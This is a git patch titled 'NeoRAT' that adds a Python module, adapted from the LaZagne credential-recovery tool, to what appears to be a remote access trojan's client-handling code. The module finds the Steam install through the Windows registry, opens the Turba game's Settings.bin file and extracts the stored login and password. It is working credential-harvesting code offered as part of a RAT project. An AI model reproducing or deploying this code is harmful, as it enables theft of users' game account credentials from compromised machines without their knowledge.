From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/games/turba.py               | 55 ++++++++++++++++++++++
 1 file changed, 55 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/games/turba.py

(limited to 'foreign/client_handling/lazagne/softwares/games/turba.py')

diff --git a/foreign/client_handling/lazagne/softwares/games/turba.py b/foreign/client_handling/lazagne/softwares/games/turba.py
new file mode 100644
index 0000000..f3604a8
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/games/turba.py
@@ -0,0 +1,55 @@
+# -*- coding: utf-8 -*-
+
+import os
+
+try: 
+    import _winreg as winreg
+except ImportError:
+    import winreg
+
+import foreign.client_handling.lazagne.config.winstructure as win
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import string_to_unicode
+
+
+class Turba(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'turba', 'games', registry_used=True)
+
+    def run(self):
+        creds = []
+        results = None
+
+        # Find the location of steam - to make it easier we're going to use a try block
+        # 'cos I'm lazy
+        try:
+            with win.OpenKey(win.HKEY_CURRENT_USER, 'Software\Valve\Steam') as key:
+                results = winreg.QueryValueEx(key, 'SteamPath')
+        except Exception:
+            pass
+
+        if results:
+            steampath = string_to_unicode(results[0])
+            steamapps = os.path.join(steampath, u'SteamApps\common')
+
+            # Check that we have a SteamApps directory
+            if not os.path.exists(steamapps):
+                self.error(u'Steam doesn\'t have a SteamApps directory.')
+                return
+
+            filepath = os.path.join(steamapps, u'Turba\\Assets\\Settings.bin')
+
+            if not os.path.exists(filepath):
+                self.debug(u'Turba doesn\'t appear to be installed.')
+                return
+
+            # If we're here we should have a valid config file file
+            with open(filepath, mode='rb') as filepath:
+                # We've found a config file, now extract the creds
+                data = filepath.read()
+                chunk = data[0x1b:].split('\x0a')
+                creds.append({
+                    'Login': chunk[0],
+                    'Password': chunk[1]
+                })
+            return creds
-- 
cgit v1.2.3